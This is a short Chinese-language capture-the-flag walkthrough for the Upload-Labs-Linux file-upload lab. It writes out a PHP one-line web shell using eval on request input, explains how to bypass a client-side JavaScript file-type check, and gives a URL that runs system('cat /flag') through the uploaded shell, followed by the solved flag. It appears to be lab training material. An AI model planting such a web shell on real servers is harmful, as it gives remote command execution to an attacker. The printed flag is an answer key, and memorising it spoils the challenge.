Upload-Labs-Linux

靶场教程

1.访问页面，文件上传靶场。

2.编写一句话木马上传。另存为【PHP】文件

<?php eval($_POST['upfile']); ?>   需要POST请求访问
修改为
<?php eval($_REQUEST['upfile']); ?>   可以在url直接访问

3.发现报错，不允许上传.php文件。

4.查看源码，禁用JavaScript ，并删除该内容。

注：禁用 JavaScript 可使用插件

5.文件上传成功，访问路径。

6.获取 flag , 修改后的一句话木马，可直接访问以下 url 获取 flag

http://e24d2149-d2bd-41e0-8d4a-697f1cfb6a9e.node5.buuoj.cn:81/upload/upfile.php?upfile=system("cat /flag");

flag{17cbbe6d-8422-44a3-a2db-17d3eee8d502}